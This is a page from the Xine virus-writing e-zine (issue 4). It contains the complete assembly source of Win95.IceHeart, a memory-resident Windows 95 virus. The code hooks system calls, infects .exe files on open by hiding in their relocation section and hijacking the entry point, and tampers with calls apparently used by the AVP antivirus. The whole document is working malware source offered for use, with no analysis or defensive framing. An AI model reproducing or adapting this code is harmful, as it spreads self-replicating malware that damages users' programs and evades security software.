Copy Link
Add to Bookmark
Report
Xine - issue #4 - Phile 210
/-----------------------------\
| Xine - issue #4 - Phile 210 |
\-----------------------------/
;last review 29.06.1999
;"â® ¨ âà®ì - ¢á¥ «¥¤..."
;Win95.IceHeart v1.5
;(c) 1998-xxxx Stainless Steel Rat /2Rats /RVA /IkX
jumps
.386
.model flat,stdcall
extrn ExitProcess:PROC
.code
start:
_start:
cld
call _Next
_Next:
pop esi
sub esi,offset _Next
push ebp
cmp byte ptr [esp+3+4],0BFh
jne _ExitNow;NT
mov ebp,_krnl_begin+178h+0Ch-40
_DoSearchSection:
add ebp,40
mov edx,[ebp];first rva
test edx,edx
jz _ExitNow
cmp dword ptr [ebp+24h-0Ch],0D0000040h;attr
jne _DoSearchSection
mov eax,[ebp+0Ch+40-0Ch];second rva
mov ebx,eax
sub eax,edx;rva delta
sub eax,[ebp+8-0Ch];virtual size
cmp ah,(virlen_in_mem/256)+1
jb _DoSearchSection
;in ebx second rva
;in edx virtual size
_SectionForUs:
sub ebx,eax
lea edi,[_krnl_begin+ebx]
lea ebp,[edi+offset _SecondStart-offset _start]
pusha
lea esi,[esi+offset _start]
_ResidencyCheck:
xor ecx,ecx
cmp byte ptr [edi],cl
jne _ExitNow2
mov ch,(virlen_in_mem/256)+1
rep movsb
call ebp
_ExitNow2:
popa
_ExitNow:
pop ebp
jmp dword ptr [offset _old_eip+esi]
_SecondStart:
mov esi,dword ptr ds:[_krnl_begin+_1st_export+0Ah]
sub ebp,offset _SecondStart
lea edi,[offset _old_vxd_call+ebp]
push esi
movsd
movsw
lea eax,[ebp+offset _Handler]
pop edi
stosd
mov ax,cs
stosw
_InitSomeVars:
mov dword ptr [offset _RelocFix+ebp+1],ebp
lea eax,[offset _old_vxd_call+ebp]
mov dword ptr [ebp+offset _JmpFword+2],eax
retn
_Handler:
pusha
_RelocFix:
mov ebp,11223344h
_CheckBusyFlag:
lea ecx,[offset _busy_flag+ebp]
xor edx,edx
cmp byte ptr [ecx],dl
jne _Exit_Handler
mov dl,0C0h
cmp eax,2A0040h;id of DeviceIoControl
jne _CheckInt21Call
_CheckAvpCalls:
cmp word ptr [edx+esp+2],22h
jne _Exit_Handler
not dword ptr [edx+esp];i think, avp likes api code,like this ;)
_CheckInt21Call:
cmp eax,2A0010h;calling int 21h ?
jne _Exit_Handler
cmp word ptr [esp+44],716Ch;openfile ?
je _Infect_It
_Exit_Handler:
popa
_JmpFword:
jmp fword ptr ds:[offset _old_vxd_call]
_Infect_It:
not byte ptr [ecx]
mov edi,esi
xor eax,eax
cld
push ecx
push eax
mov ecx,esp
repnz scasb
pop ecx
mov eax,dword ptr [edi-5]
or eax,20202000h
cmp eax,'exe.'
; cmp eax,'eci.'
jne _ExitInfector
_InfectFile:
xor byte ptr [offset _Name+4+ebp],13
_AllocStack:
mov ch,4;1024
sub esp,ecx
push ecx
_OpenFile:
xor edi,edi
xor eax,eax
cdq
inc edx
mov ebx,edx
inc ebx
mov ax,716Ch
call _Int21h
xchg eax,ebx
jc _FreeStack
mov ah,3Fh
call _Process_1024b
cmp ecx,eax
jne _CloseJmp
mov eax,[edi+3Ch]
shr ecx,1
cmp eax,ecx
jae _CloseJmp
add edi,eax
mov eax,[edi]
inc eax;heuristics sucks
cmp ax,'EP'+1;sign
jne _CloseJmp
cmp byte ptr [edi+61h],7Dh;winzip's sfx stack size
je _CloseJmp
_CheckAlreadyInfected:
cmp byte ptr [edi+1Ah],al
je _CloseJmp
mov byte ptr [edi+1Ah],al
test byte ptr [edi+23],22h;dll or fixed image
jne _CloseJmp
mov byte ptr [edi+23],0;strip reloc
mov edx,dword ptr [edi+160];fixup section
test edx,edx
je _CloseJmp
push edx
xchg dword ptr [edi+40],edx;entry point
add edx,dword ptr [edi+48+4];image base
mov dword ptr [offset _old_eip+ebp],edx
pop edx
_AnalyzePlaceInFixupArea:
mov ecx,[edi+6]
lea esi,[edi+0F8h+12];rva
_DoAnalyzeSections:
lodsd
cmp eax,edx;search section with rva=fixup rva
je _OkiFixupOur
add esi,40-4
loop _DoAnalyzeSections
_CloseJmp:
jmp _Close
_OkiFixupOur:
lodsd;phys size
mov edx,virlen
cmp eax,edx
jb _CloseJmp
mov dword ptr [esi-12],edx
push edx
lodsd;phyz ofs
_Int21CallOptimization:
lea esi,[ebp+offset _Int21h]
_SeekToEnd:
push eax
pop dx
pop cx
mov ax,4200h
call esi
_WriteSelf:
mov ah,40h
lea edx,[ebp+offset _start]
pop ecx
call esi
_WriteHeader:
xor eax,eax
mov ah,42h
cdq
call esi
mov ah,40h
call _Process_1024b
_Close:
mov ah,3Eh
call _Int21h
_FreeStack:
pop ecx
add esp,ecx
_ExitInfector:
pop ecx
not byte ptr [ecx]
jmp _Exit_Handler
_Process_1024b:
lea edi,[esp+4+4]
xor ecx,ecx
mov ch,4;1024
mov edx,edi
_Int21h:
push ecx
push ebp
push ecx eax
push 2A0010h
mov ebp,_krnl_begin+_1st_export
call ebp
pop ebp
pop ecx
retn
_Name db 'Win95.iCE-hEART',0
_Msg db ' â èª , ï â¥¡ï ¡¥§ã¬® «î¡«î !',0
_old_eip dd offset ExitProcess
virlen equ $-offset start
_old_vxd_call db 6 dup ('')
_busy_flag db ''
virlen_in_mem equ $-offset start
ends
.data
db 13,10
_krnl_begin equ 0BFF70000h
_1st_export equ 13D4h
end start
